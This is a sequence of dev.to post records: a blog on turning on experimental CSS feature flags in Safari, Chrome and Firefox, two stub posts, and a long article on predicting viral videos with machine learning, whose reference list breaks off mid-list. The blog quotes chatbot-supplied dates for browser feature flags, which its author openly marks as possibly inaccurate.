--- title: How to try experimental CSS features published: true date: 2024-07-05 01:10:21 UTC tags: css, webdev canonical_url: https://chenhuijing.com/blog/how-to-try-experimental-css-features/ cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2lzjhhdzwzaucsexxm0o.jpg --- I love that browsers are now shipping new CSS features that may not necessarily have been fully baked yet behind feature flags. I can’t actually pinpoint the exact date or event that started this, but my personal observation (because I was there) tags it at the development of CSS grid. If you were not around for it, all the major browsers supported the stable version of CSS grid within 8 months of each other. Trust me, I took the time to check the dates in order to make this image for my talks. ![Dates when CSS grid where released in 2017](https://chenhuijing.com/assets/images/posts/experimental-css/grid-release-1280.png) Browser vendors and CSS specification authors want real-world developer feedback during the feature development process to work out the kinks in the proposals and implementations. They had tried using vendor prefixes as an earlier approach, and we ended up with a decade’s worth of baggage, where browsers had to support property names that were deprecated in the specification because there will be people who inevitably [choose to eat the marshmallow quickly instead of waiting it out](https://en.wikipedia.org/wiki/Stanford_marshmallow_experiment) and use features that are not ready in production. When CSS grid rolled around, they tried a different approach. CSS grid was available to developers who wanted to try it out but behind feature flags in the respective browsers. This meant that the developer who decided to use the not-yet-ready feature had to bank on their audience turning on the flag themselves, and we all know that’s not likely to happen. Which is why when browsers rolled out CSS grid in their stable versions, they did not have to worry about having to support earlier iterations of the syntax running around in the wild, because those were really quite minimal. The approach worked. And I think that’s why it has become a standard approach to how new CSS features are being released these days. ## The UI of feature flags Every browser handles their feature flags differently, and after seeing Safari’s approach for the first time today, I thought I’d summarise how the major browsers we develop on do this. I asked ChatGPT when each of the big 3 introduced feature flags and here are the answers. 🙋🏻‍♀️: when did chrome introduce feature flags? 🤖: Google Chrome introduced feature flags (also known as experimental features) with the launch of Chrome 8 in **December 2010**. Feature flags allow users to enable or disable various experimental features and options before they are officially released, by visiting chrome://flags in the browser. 🙋🏻‍♀️: when did firefox introduce feature flags? 🤖: Mozilla Firefox introduced feature flags, accessible via about:config, much earlier than Chrome. The about:config interface has been available since at least Firefox 2, which was released in **October 2006**. This interface allows users to modify advanced settings and enable or disable experimental features. 🙋🏻‍♀️: and when did safari roll out it’s new feature flag tab in developer settings? 🤖: Safari rolled out its new feature flag tab in the Developer settings with the release of Safari 13, which was introduced in **September 2019**. 
This feature, accessible through the “Develop” menu, allows developers to enable or disable experimental features and technologies in the browser. I think these should be largely accurate, someone tell me if they’re not. ### Safari Admittedly, Safari is not a browser I use on the regular, only when testing, and it is generally a cursory load page, scroll page, move on to next page, kind of thing. So sadly, it was only recently (5 years after release) that I noticed “Feature Flags” had a dedicated tab in Developer settings. ![Feature flag tab in Safari's developer settings](https://chenhuijing.com/assets/images/posts/experimental-css/[email protected]) To me, this is a significant improvement in developer experience because it makes testing new features (not just CSS but all the other web APIs) easily discoverable and toggleable (this is not a word, I know). The steps for Safari are: 1. From the menu bar choose Develop > Feature Flags… 2. Scroll through the list and pick what you want to try 3. Toggle the respective checkbox 4. Relaunch the browser That’s it. Feature flags have been elevated to a first-class developer feature in Safari, given it gets dedicated menu shortcut space in the Develop dropdown. So I’m pretty impressed by this experience. You can read [Safari’s documentation](https://developer.apple.com/documentation/safari-developer-tools/feature-flag-settings) for more details. ### Chrome Chrome doesn’t do feature flags that granularly (at least that’s my observation). But they have had this feature for as long as since I started really deep diving into CSS. Chrome does flags in a broader manner and it can be summarised as major features, which have feature-specific flags, smaller features which take around 1-2 quarters of work under `#enable-experimental-web-platform-features` and very rarely, features that only ship in Canary. ![Feature flags interface on Chrome](https://chenhuijing.com/assets/images/posts/experimental-css/[email protected]) The steps for Chrome are: 1. Type `chrome://flags` in your address bar 2. Search for the feature 3. Set value to **Enabled** M 4. Relaunch the browser ![Using the search bar on the feature flags interface in Chrome](https://chenhuijing.com/assets/images/posts/experimental-css/[email protected]) Might be less intuitive than the Safari interface, and I’m not too sure where to find the list of features covered in under the `#enable-experimental-web-platform-features` flag, but still, good enough for me. You can read [Chrome’s documentation](https://developer.chrome.com/docs/web-platform/chrome-flags) for more details. ### Firefox Firefox takes the granular approach as well, but in a more “raw” manner. Basically, after you get past the Here be dragons message (I think they changed the copy but it was fun back then), you get a blank results screen that again warns you of messing up the browser. But once you click “Show all”, you will notice that the flags follow a naming convention. ![Initial screen in Firefox's configuration interface](https://chenhuijing.com/assets/images/posts/experimental-css/[email protected]) I think these flag names are exposed from their usage in the source code (see [StaticPrefList.yaml](https://searchfox.org/mozilla-central/source/modules/libpref/init/StaticPrefList.yaml)), because if you do it like Safari or Chrome, there’s probably an extra mapping to link the actual source code to the presentation of the feature in plain English. Just my speculation. The steps for Firefox are: 1. 
Type `about:config` in your address bar 2. Accept the risk and continue knowing that you might screw up your browser messing with flags 3. Search for the feature you want 4. Double-click on the feature to toggle it. You can also change string values if that is relevant. 5. Relaunch the browser ![Using the search bar on the feature flags interface in Firefox](https://chenhuijing.com/assets/images/posts/experimental-css/[email protected]) The search function is pretty crucial here, but overall, you know which features you’re toggling, and because it covers all browser features, it’s not simply boolean, there are string and number values you can manipulate as well. I guess that’s why there’s an extra layer of here be dragons before letting you play around. You can read [Firefox’s documentation](https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Experimental_features) for more details. ## Wrapping up Well, that’s it. Nice and short. Keep exploring, but don’t blow up your browser! _<small>Credits: OG:image from <a href="https://www.deviantart.com/egor412112/art/Cat-scientist-752200669">Egor412112</a></small>_
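A small practical aside: if you publish demos that rely on a flagged feature, it is worth feature-detecting at runtime so visitors without the flag still get a working page. The sketch below is only an illustration; the specific features being tested are arbitrary examples, not recommendations:

```
// Minimal sketch: feature-detect before relying on a CSS feature, so the page
// still works for visitors who have not flipped any flags.
const hasGrid = CSS.supports('display', 'grid');            // property/value form
const hasHasSelector = CSS.supports('selector(:has(a))');   // condition form

document.documentElement.classList.toggle('supports-has', hasHasSelector);

if (!hasGrid) {
  console.log('Grid not supported here; a fallback layout will be used.');
}
```

The same guard can live entirely in the stylesheet with an `@supports (...)` block if no JavaScript is involved.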
huijing
1,912,109
Hello! I'm very thrilled to meet new people and also to become part of this
A post by Caleb Kwao
0
2024-07-05T01:04:24
https://dev.to/caleb_kwao_edf0f2c42a99f8/hello-im-very-thrill-to-meet-new-people-also-to-become-part-of-this-eg3
caleb_kwao_edf0f2c42a99f8
1,912,108
Answer: How to increment ID inside a <%= for %> view helper
answer re: How to increment ID inside a...
0
2024-07-05T00:58:09
https://dev.to/sonfordson/answer-how-to-increment-id-inside-a-view-helper-1b4a
{% stackoverflow 42993988 %}
sonfordson
1,912,106
How to Predict the Next Viral Video Using Machine Learning
In today's digital age, the quest for predicting the next viral video has become the holy grail for...
0
2024-07-05T00:49:05
https://dev.to/victoramit/how-to-predict-the-next-viral-video-using-machine-learning-2m80
machinelearning, deeplearning, ai, python
![Article Image](https://i.ibb.co/fth730s/aab00ff9-7d3e-4611-b95c-23aa992b3ffc-ezgif-com-video-to-gif-converter.gif&w=1080) In today's digital age, the quest for predicting the next viral video has become the holy grail for content creators and marketers alike. With platforms like TikTok redefining what counts as a viral video, understanding the dynamics behind video sharing and the elements that captivate millions is more valuable than ever. The intersection of machine learning models and social media analytics offers unprecedented opportunities to not just comprehend but also anticipate the trends that will dominate your feeds. Whether you're aiming to achieve TikTok earnings for 2 million likes or simply looking to understand the mechanics of going viral on social media, leveraging the power of predictive analytics can unlock new realms of digital strategy. This article will guide you through the journey of Predicting the Next Viral Video, starting from grasping the essence of viral videos—which often combine an authentic point of view with strong emotional appeal and captivating visual elements—to deploying sophisticated machine learning models capable of identifying potential hits. You will learn about the importance of data collection and preprocessing, the intricacies of feature engineering tailored to video features like text captions and recommendation algorithms, and the strategies for building and optimizing predictive models. By the end, deploying the model will no longer feel like an insurmountable challenge, but rather a calculated step toward harnessing the chaotic energy of viral video sharing, ensuring you have the tools needed to make informed predictions in the rapidly evolving landscape of short videos and social media platforms. ## Understanding Virality ### What is Virality? Virality, in the context of digital marketing, refers to the phenomenon where content spreads rapidly across social media platforms due to shares, likes, and other forms of engagement from users. This rapid spread is akin to the way a virus transmits, hence the term "virality" [1](https://influencermarketinghub.com/glossary/virality/). Viral content can significantly boost visibility and engagement, impacting a brand or individual's presence online [2](https://later.com/social-media-glossary/viral/). It can occur organically, driven by the content's appeal, or as a result of strategic marketing efforts [2](https://later.com/social-media-glossary/viral/). ### Factors Contributing to Virality Several key factors influence whether a video or content piece becomes viral. Emotional appeal is crucial; content that evokes strong feelings like joy, surprise, or awe is more likely to be shared [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). Relatability also plays a significant role, as content that viewers find personally resonant or reflective of common experiences tends to spread widely [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). Timeliness adds to virality, with content relevant to current trends or events gaining traction faster [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). 
The content's brevity and clarity help maintain viewer attention, making concise messages more effective [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). High production quality, while not mandatory, can enhance the perceived value of the content [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). Incorporating music and sound strategically can amplify emotional responses and engagement [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). A clear call to action, such as prompts to share or subscribe, can also encourage viewers to spread the content further [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). Optimizing content for specific platforms by using relevant hashtags, captions, and engaging thumbnails is essential for maximizing reach [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). Finally, proactive distribution and promotion across various platforms and collaborations with influencers can significantly increase a content piece's visibility and potential to go viral [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). Data analysis plays a pivotal role in understanding audience preferences and refining strategies to boost virality [3](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared). ## The Essence of Viral Videos Viral videos are online clips that achieve sudden and widespread popularity, often characterized by widespread sharing, rapid engagement, and extensive reach [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). These videos transcend geographical and cultural boundaries, sparking discussions worldwide. The key to their success often lies in their ability to tap into universal themes or emotions, making them relatable and emotionally engaging [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). ### Key Characteristics of Viral Content Viral content typically includes videos that are hard to ignore and easy to share. Emotional appeal is crucial; videos that evoke strong reactions like laughter, awe, or empathy are more likely to be shared [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). Relatability also plays a significant role, as people tend to share content that reflects their own experiences or cultural references [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). Moreover, the timing of a video’s release can significantly affect its virality, especially if it aligns with current trends or events [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). 
High-quality production and strategic use of music and sound can further enhance a video's appeal [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). Effective viral videos also incorporate elements that encourage viewer interaction, such as challenges, duets, or prompts for comments, which can drive higher engagement rates and further amplify their reach [5](https://medium.com/@trulydigitalmedia/the-science-of-going-viral-analyzing-tiktoks-viral-phenomenon-1fcfbd5753d3). Utilizing relevant hashtags and engaging with trending topics or challenges are additional tactics that help increase a video's visibility and shareability [5](https://medium.com/@trulydigitalmedia/the-science-of-going-viral-analyzing-tiktoks-viral-phenomenon-1fcfbd5753d3). ### Case Studies Several case studies highlight the strategic elements behind successful viral videos. For instance, the "Ice Bucket Challenge" not only entertained but also raised awareness for ALS, combining entertainment with a cause, which encouraged widespread participation and sharing [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). Another example is humorous and heartwarming videos, like those featuring unexpected acts of kindness or adorable animals, which often go viral due to their emotional content [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). In the realm of planned virality, some videos are crafted by influencers and marketers who leverage social media algorithms and optimal posting times to maximize visibility and engagement [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). These efforts are complemented by content that is inherently shareable, be it through humor, relatability, or timely relevance to current events and trends [4](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/). In conclusion, creating viral content involves a blend of creativity, strategic planning, and an understanding of what resonates with audiences on a human level. Whether by chance or design, the elements of shareability, emotional engagement, and timely relevance are consistently at the core of viral video success. ## Overview of Machine Learning Machine learning, a cornerstone of modern artificial intelligence, leverages algorithms and statistical models to enable computers to perform tasks without explicit programming. By analyzing patterns and learning from data, machine learning can make informed predictions and decisions [6](https://www.jumpdatadriven.com/machine-learning-for-video-analysis-what-it-is-and-how-it-works/). ### Basics of Machine Learning At the heart of machine learning is the ability to identify patterns and make data-driven recommendations. This process begins with the collection of large datasets, which are then used to train algorithms. The trained model can recognize similar patterns in new data and provide relevant outputs, such as identifying objects in videos or predicting video virality [7](https://www.ridgerun.com/video-based-ai). Machine learning models are particularly effective in handling complex datasets and can be applied to a variety of data types, including text, images, and videos [6](https://www.jumpdatadriven.com/machine-learning-for-video-analysis-what-it-is-and-how-it-works/). 
### Types of Algorithms Used Machine learning algorithms are broadly categorized into three types: supervised learning, unsupervised learning, and reinforcement learning. Supervised learning involves training a model on a labeled dataset, where the input data is tagged with the correct output. This method is ideal for tasks where the desired outcome is known, such as classifying videos based on their content [8](https://www.analyticsvidhya.com/blog/2023/04/machine-learning-for-social-media/). Unsupervised learning, on the other hand, does not require labeled data. Instead, it identifies patterns and relationships in the data on its own, which is useful for discovering hidden structures in untagged data [8](https://www.analyticsvidhya.com/blog/2023/04/machine-learning-for-social-media/). Reinforcement learning is a dynamic process where models learn to make decisions by receiving feedback on their actions. This feedback, in the form of rewards or penalties, helps the model adjust its strategies to achieve the best results in a given environment [8](https://www.analyticsvidhya.com/blog/2023/04/machine-learning-for-social-media/). Each type of learning algorithm has its strengths and is chosen based on the specific requirements of the task at hand. For video analysis, convolutional neural networks (CNNs) and recurrent neural networks (RNNs) are commonly used. These networks are capable of handling the spatial and temporal data inherent in videos, making them suitable for tasks such as object recognition and activity recognition in video streams [6](https://www.jumpdatadriven.com/machine-learning-for-video-analysis-what-it-is-and-how-it-works/). By leveraging these algorithms, machine learning not only enhances the efficiency of video analysis but also opens up new possibilities for predictive analytics in content creation. This technological advancement allows content creators and marketers to anticipate audience preferences and tailor their strategies accordingly [9](https://divvyhq.com/content-automation/machine-learning-in-content-marketing/). ## Data Collection and Preprocessing ### Sources of Data Your journey in predicting the next viral video starts with the meticulous collection of data. For instance, by leveraging the Twitter streaming API, you can gather a vast array of video links shared over a 24-hour period [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). This method ensures a diverse dataset, capturing a wide range of content from various users and contexts. Additionally, platforms like Kaggle provide access to structured data repositories that include detailed video attributes which are essential for in-depth analysis [11](https://kala-shagun.medium.com/youtube-virality-prediction-using-bert-and-catboost-ensemble-86e90c334921). ### Cleaning and Preparing Data Once data collection is complete, the critical phase of data cleaning begins. This involves several meticulous steps to ensure the quality and usability of your data for machine learning models. Initially, you must handle basic cleaning tasks such as removing duplicates, correcting inconsistencies, and dealing with missing values [12](https://www.obviously.ai/post/data-cleaning-in-machine-learning). For example, datasets often contain duplicate records that can skew your analysis and must be removed to maintain the integrity of your models [13](https://www.v7labs.com/blog/data-cleaning-guide). Further, the transformation of categorical data into a numerical format is crucial. 
Techniques like Label Encoding convert text data into numbers, making it readable for algorithms [11](https://kala-shagun.medium.com/youtube-virality-prediction-using-bert-and-catboost-ensemble-86e90c334921). Normalization of numerical columns, such as video duration, helps in mitigating bias by ensuring no single feature dominates [11](https://kala-shagun.medium.com/youtube-virality-prediction-using-bert-and-catboost-ensemble-86e90c334921). Moreover, the preprocessing phase involves structuring your data to enhance machine learning readiness. This includes organizing data into a single file or table, ensuring it contains minimal missing values, and removing irrelevant information such as personal identifiers [12](https://www.obviously.ai/post/data-cleaning-in-machine-learning). Each step is vital to refine the dataset, which directly influences the effectiveness of your predictive model. By adhering to these meticulous preprocessing steps, you set a strong foundation for building robust machine learning models that can more accurately predict viral video trends. ## Feature Engineering In the domain of predicting viral videos, feature engineering plays a pivotal role by transforming raw data into a format that is better suited for models to understand and predict outcomes. This section covers the key processes involved in identifying and creating new features that significantly influence a video's potential to go viral. ### Identifying Key Features The initial step in feature engineering is to identify which characteristics of videos can predict virality. A mixed-methods strategy is employed where videos featuring popular hashtags on TikTok are analyzed to determine indicators of virality [14](https://arxiv.org/pdf/2111.02452). For instance, the number of likes is a direct measure of a video's popularity and potential virality. Additionally, the creator's popularity and specific video attributes such as the scale and point of view (e.g., a close-up or a medium-scale shot from a second-person perspective) are found to have substantial impacts on a video's viral potential [14](https://arxiv.org/pdf/2111.02452). Moreover, the inclusion of trending hashtags at the time of posting increases the likelihood of a video going viral [14](https://arxiv.org/pdf/2111.02452). A logistic regression model, with an impressive Area Under the ROC Curve (AUC) of 0.93, demonstrates the effectiveness of these identified features in distinguishing between videos that will go viral and those that will not [14](https://arxiv.org/pdf/2111.02452). ### Creating New Features Once key indicators are identified, the next step is creating new features that enhance the predictive power of the models. This involves deriving additional features from existing data, which can provide deeper insights into the factors that contribute to a video's success. For example, features extracted from platforms like Twitter and YouTube include video views, likes, and comments, which are crucial for assessing engagement [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). Modifiers such as the ratio of views on a particular day to the total views (views ratio), the acceleration of views (views acceleration), and the difference in views over a specific period (views difference) are used to capture the dynamics of user engagement over time [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). 
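To make these derived engagement signals concrete, here is a small JavaScript sketch that computes a views ratio, views difference, and views acceleration from daily view counts; the function name, data layout, and numbers are hypothetical and not taken from the cited study:

```
// Minimal sketch: derive simple engagement features from daily view counts.
// viewsPerDay[i] = views gained on day i (hypothetical data, not from the cited study).
function engagementFeatures(viewsPerDay) {
  const n = viewsPerDay.length;
  const totalViews = viewsPerDay.reduce((sum, v) => sum + v, 0);
  const today = viewsPerDay[n - 1];
  const yesterday = n > 1 ? viewsPerDay[n - 2] : 0;
  const dayBefore = n > 2 ? viewsPerDay[n - 3] : 0;

  return {
    viewsRatio: totalViews > 0 ? today / totalViews : 0,             // share of all views earned on the latest day
    viewsDifference: today - yesterday,                              // day-over-day change in views
    viewsAcceleration: (today - yesterday) - (yesterday - dayBefore) // change of the day-over-day change
  };
}

console.log(engagementFeatures([120, 480, 2100, 9400]));
// => { viewsRatio: ≈0.78, viewsDifference: 7300, viewsAcceleration: 5680 }
```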
These features are then fed into advanced classifiers like Gradient Boosted Decision Trees to predict the virality and popularity of videos more accurately [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). By systematically identifying and creating impactful features, you can significantly enhance the accuracy of machine learning models in predicting the next viral video. This process not only sharpens the predictive analytics but also provides a robust framework for content creators and marketers to strategize their video productions for maximum viral reach. ## Building Predictive Models ### Choosing the Right Algorithm When building predictive models for viral video prediction, selecting the right algorithm is crucial. A Gradient Boosted Decision Tree is often employed due to its effectiveness in handling general classification problems [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). This type of algorithm is particularly adept at managing the complex scenarios typical in predicting video virality, where the aim is to forecast popularity with minimal historical data [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). ### Training and Validation The training and validation of your predictive model are essential steps to ensure its accuracy and reliability. A common method used is the 10-fold validation methodology. Here, 90% of the data is used for training, where both the training window and labeling window data are available, allowing the model to learn which videos become viral or popular. The remaining 10% is then used for validation, predicting the virality or popularity class labels during the labeling window. This approach helps in assessing the precision and recall of the model. The performance is further quantified using metrics such as the area under the precision-recall curve (AUC) and the mean F1 score [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). This rigorous validation process is repeated multiple times with different data subsets to ensure consistency and reliability of the predictive model. The results from these experiments are averaged to provide a robust measure of the model’s predictive accuracy [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). Additionally, the analysis of feature importance highlights that predictions using YouTube data tend to be more accurate than those using Twitter data, suggesting that the platform from which the data is sourced can significantly influence the predictive success of the model [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). This insight is crucial for refining the feature selection in future model iterations, especially when early prediction of recently uploaded videos is a key challenge [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). The need to augment baseline features with additional data mined from original sources is emphasized to enhance the model's accuracy in predicting virality and popularity of new videos [10](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf). By understanding these key aspects of algorithm choice and model validation, you can enhance your ability to predict which videos will capture the public's attention and go viral, thereby informing more strategic content creation and marketing efforts. ## Evaluating Model Performance ### Metrics for Success To effectively evaluate the performance of machine learning models in predicting viral videos, a comprehensive set of metrics is utilized. 
Sensitivity, specificity, and F1-scores provide a balanced view of model accuracy by measuring both the true positive rate and the ability to avoid false positives [15](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9904219/). Additionally, the Receiver Operating Characteristic (ROC) curves and Area Under the Curve (AUC) values are critical, with high AUC values indicating better model performance. For instance, in one study, the AUC for certain models reached as high as 0.99, demonstrating their exceptional accuracy in specific contexts [15](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9904219/). Moreover, the use of confusion matrices helps in visualizing the performance of each class within the model, allowing for a detailed assessment of both false positives and false negatives [15](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9904219/). This is complemented by evaluating the positive predictive value (PPV) and negative predictive value (NPV), which provide insights into the reliability of the model in predicting viral outcomes. ### Common Pitfalls While evaluating model performance, several common pitfalls can adversely affect the outcomes. One major issue is the premature cessation of model testing, which can lead to misleading conclusions about a model's effectiveness [16](https://fastercapital.com/topics/how-to-avoid-common-pitfalls-and-mistakes-with-video-ads.html). Additionally, small or unrepresentative sample sizes can skew results, making it difficult to generalize findings to broader applications. Bias and confounding factors also pose significant challenges. These can arise from external variables such as seasonal trends or competing content, which might influence the results independently of the model's predictive power [16](https://fastercapital.com/topics/how-to-avoid-common-pitfalls-and-mistakes-with-video-ads.html). It's crucial to account for these factors during the evaluation phase to ensure the accuracy and applicability of the model. Lastly, the choice of metrics itself can lead to biases in model evaluation. For instance, focusing solely on sensitivity might prioritize the detection of viral content but at the expense of increasing false positives. Therefore, a balanced approach that considers multiple metrics is essential for a comprehensive evaluation [17](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC8459865/). By understanding these metrics and being aware of common pitfalls, you can more accurately assess the performance of machine learning models aimed at predicting the next viral video. This rigorous evaluation is key to refining the models and enhancing their predictive capabilities in real-world scenarios. ## Optimizing and Tuning Models ### Hyperparameter Tuning In the realm of machine learning, hyperparameter tuning is essential for enhancing the performance of your models. Hyperparameters, which are settings that are not learned from the data, significantly influence the outcome of the learning process. For example, in a random forest model, hyperparameters such as `max_features`, `number_trees`, and `random_state` need to be optimized [18](https://www.analyticsvidhya.com/blog/2015/12/improve-machine-learning-results/). This optimization involves selecting optimal values that increase the accuracy of the machine learning model, a process that can be repeated across various well-performing models to identify the most effective settings [18](https://www.analyticsvidhya.com/blog/2015/12/improve-machine-learning-results/). 
Different methods are employed to find these optimal values. Grid search, for instance, systematically works through multiple combinations of parameter values, providing a comprehensive method to determine the best combination for model performance [19](https://www.geeksforgeeks.org/hyperparameter-tuning/). Alternatively, random search selects hyperparameter values at random and can often find a good combination much faster than the exhaustive grid search [19](https://www.geeksforgeeks.org/hyperparameter-tuning/). More sophisticated techniques like Bayesian optimization consider previous results to guide the selection of the next set of hyperparameters, often leading to faster and more effective tuning [19](https://www.geeksforgeeks.org/hyperparameter-tuning/). ### Improving Accuracy To ensure that improvements in model accuracy are genuine and not due to overfitting, cross-validation is used. This technique involves partitioning the data into subsets, training the model on some subsets while testing it on others. This method helps achieve more generalized relationships and provides a robust estimate of the model’s performance on unseen data [18](https://www.analyticsvidhya.com/blog/2015/12/improve-machine-learning-results/). For instance, tuning an XGBoost model involves adjusting parameters like `gamma`, `eta`, and `learning_rate`, which control the model's complexity and learning speed. Studies have shown that a tuned XGBoost model can achieve up to 88% accuracy, with precision and recall rates also showing significant improvement [20](https://www.mdpi.com/2079-9292/10/23/2962)[21](https://www.researchgate.net/publication/356595714_Optimizing_Prediction_of_YouTube_Video_Popularity_Using_XGBoost). This demonstrates the effectiveness of careful hyperparameter tuning and model training practices in enhancing the predictive capabilities of machine learning models. By meticulously optimizing hyperparameters and employing rigorous validation techniques, you can significantly improve the accuracy and generalizability of your predictive models, ensuring they perform well across different datasets and real-world scenarios. ## Deploying the Model Once your machine learning model is ready for real-world application, the next critical step is deployment. Deployment involves integrating the model into an existing production environment where it can start providing value based on its predictive capabilities. ### Integration with Platforms Deploying a machine learning model effectively means ensuring it can interact seamlessly with other applications and services. For instance, models can be hosted on cloud platforms and accessed via API endpoints, which act as intermediaries between the model and the end-users [22](https://neptune.ai/blog/deploying-computer-vision-models). This setup allows for the model to be consumed through various interfaces, depending on the end-user’s needs, ranging from simple command-line interfaces to more complex web-based or app-based UIs [22](https://neptune.ai/blog/deploying-computer-vision-models). In some cases, models are deployed on edge devices where data consumption occurs at the point of data origin, which is crucial for applications requiring low latency [22](https://neptune.ai/blog/deploying-computer-vision-models). ### Monitoring and Maintenance After deployment, continuous monitoring and maintenance are essential to ensure the model performs as expected over time. 
This involves tracking performance metrics such as accuracy, precision, and recall, and watching for model drift, which occurs when the model's performance degrades due to changes in the underlying data [23](https://www.fiddler.ai/model-monitoring-tools/how-do-you-maintain-a-deployed-model). Tools like Fiddler or Modelbit provide functionalities to monitor these metrics effectively, offering insights into model behavior and helping detect any performance issues promptly [23](https://www.fiddler.ai/model-monitoring-tools/how-do-you-maintain-a-deployed-model) [24](https://www.reddit.com/r/mlops/comments/15z3bfo/model_performance_in_production/). Moreover, regular updates and retraining of the model with new data are necessary to keep it relevant and effective. Retraining involves using new data to update the model's understanding and adjust its predictions, which helps in maintaining its accuracy [23](https://www.fiddler.ai/model-monitoring-tools/how-do-you-maintain-a-deployed-model). This process can be automated using machine learning pipelines that handle data ingestion, model retraining, evaluation, and redeployment smoothly [25](https://www.sigmoid.com/blogs/5-best-practices-for-deploying-ml-models-in-production/). By ensuring robust integration with platforms and diligent monitoring and maintenance, you can maximize the effectiveness and longevity of your deployed machine learning model, making it a valuable asset in your predictive analytics arsenal. ## Conclusion Throughout this article, we've embarked on a comprehensive exploration of the fascinating intersection between machine learning and social media trends, specifically focusing on the prediction of viral videos. By delving into the core elements that often underpin viral content, such as emotional resonance, timeliness, and relatability, and coupling these with the sophisticated capabilities of machine learning models, we've uncovered potent strategies that can forecast which videos are likely to captivate and engage audiences on a massive scale. In doing so, the article has highlighted the importance of data collection, preprocessing, and the intricacies of feature engineering, thereby equipping readers with the knowledge to harness the predictive power of machine learning for their digital strategies. As we conclude, it's clear that the potential for machine learning to revolutionize content creation and marketing is immense, offering a blueprint for not just reacting to digital trends but proactively setting them. However, the journey does not end here. The rapidly evolving nature of social media and machine learning technology suggests a future where predictive analytics becomes even more integral to success in the digital realm. Readers are encouraged to continue exploring, experimenting with, and refining their approaches to machine learning in content prediction, ensuring they stay at the forefront of this dynamic intersection of technology and creativity. ## FAQs **1. How does machine learning forecast future events?** Machine learning forecasting involves using a trained algorithm that analyzes historical data to produce likely outcomes for unknown variables in new data sets. **2. Is it possible for machine learning to generate predictions?** Yes, machine learning can generate predictions and often does so using larger and more complex datasets than traditional methods, such as trend analysis, which typically only uses past sales data for forecasting. **3. 
What is the most effective machine learning algorithm for making predictions?** Linear regression is considered one of the most effective supervised learning algorithms for making predictions. It is used to forecast values within a continuous range, like sales figures or pricing. **4. How do machine learning models predict future outcomes?** Machine learning models operate by learning from data, identifying patterns, and understanding relationships within the data. This enables them to predict outcomes for new, previously unseen data. For applications that require immediate results, models that can quickly process and analyze incoming data in real-time are necessary. ## References [1] - [https://influencermarketinghub.com/glossary/virality/](https://influencermarketinghub.com/glossary/virality/) [2] - [https://later.com/social-media-glossary/viral/](https://later.com/social-media-glossary/viral/) [3] - [https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared](https://www.quora.com/What-factors-contribute-to-a-video-going-viral-Can-patterns-be-identified-in-the-data-to-determine-what-makes-a-video-popular-and-widely-shared) [4] - [https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/](https://storyful.com/blog/all/cracking-the-code-behind-viral-videos-what-makes-a-video-go-viral/) [5] - [https://medium.com/@trulydigitalmedia/the-science-of-going-viral-analyzing-tiktoks-viral-phenomenon-1fcfbd5753d3](https://medium.com/@trulydigitalmedia/the-science-of-going-viral-analyzing-tiktoks-viral-phenomenon-1fcfbd5753d3) [6] - [https://www.jumpdatadriven.com/machine-learning-for-video-analysis-what-it-is-and-how-it-works/](https://www.jumpdatadriven.com/machine-learning-for-video-analysis-what-it-is-and-how-it-works/) [7] - 